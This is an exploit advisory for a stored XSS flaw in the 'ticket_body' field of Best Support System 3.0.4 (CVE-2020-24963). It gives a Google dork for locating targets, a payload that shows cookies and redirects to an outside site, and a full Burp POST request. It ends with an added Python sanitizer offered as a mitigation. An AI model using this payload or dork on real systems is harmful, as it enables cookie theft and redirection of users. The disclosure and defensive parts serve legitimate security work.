TheHackerWorld Official

Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)

# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
# Google Dork: "Powered By Best Support System"
# Date: 2020-08-23
# Exploit Author: Ex.Mi [ https://ex-mi.ru ]
# Vendor: Appsbd [ https://appsbd.com ]
# Software Version: 3.0.4
# Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
# Tested on: Kali Linux
# CVE: CVE-2020-24963
# CWE: CWE-79


[i] :: Info:

An authenticated persistent (stored) XSS vulnerability was discovered in the
'ticket_body' parameter of Best Support System; the tested version is v3.0.4.


[$] :: Payloads:

13"-->">'` -- `<!--<img src="--><img src=x
onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>


[!] :: PoC (Burp Suite POST request):

POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://localhost
Connection: close
Referer: https://localhost/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
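
Mitigation sketch, added here as an example (it is not part of the original advisory and not the vendor's code): a server-side allowlist sanitizer for the rich-text ticket_body field, which rebuilds the markup from parser events so that disallowed tags and every attribute are dropped before the reply is stored or rendered. The tag allowlist, the function names and the sample request body are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Assumed policy: tags a ticket reply may keep. Every attribute is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "pre", "code"}
VOID_TAGS = {"br"}

class TicketBodySanitizer(HTMLParser):
    """Rebuilds markup from parser events; no input is copied through raw."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized fragments
        self.dropped = []  # rejected tags and attributes, for logging

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")
        else:
            self.dropped.append(tag)
        self.dropped.extend(f"{tag}[{name}]" for name, _ in attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text, including anything the parser could not read as a tag,
        # is re-encoded so it can only ever render as text.
        self.out.append(html.escape(data))
    # Comments, doctypes and processing instructions fall through to the
    # base-class no-op handlers and are therefore removed.

def sanitize_ticket_body(raw):
    parser = TicketBodySanitizer()
    parser.feed(raw)
    parser.close()  # flush trailing text
    return "".join(parser.out), parser.dropped

def sanitize_post(form_body):
    """Decode a urlencoded reply POST and sanitize its ticket_body field."""
    fields = parse_qs(form_body)
    return sanitize_ticket_body(fields.get("ticket_body", [""])[0])

# Constructed sample request body (not the request from the advisory).
SAMPLE_POST = ("ticket_body=%3Cp%3EPrinter+offline%3C%2Fp%3E"
               "%3Cimg+src%3D%22x%22+onerror%3D%22alert(1)%22%3E&status=")

if __name__ == "__main__":
    print(sanitize_post(SAMPLE_POST))
```

The dropped list is worth logging with the ticket id and the authenticated user, since a reply that loses an event-handler attribute is a useful detection signal.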
            
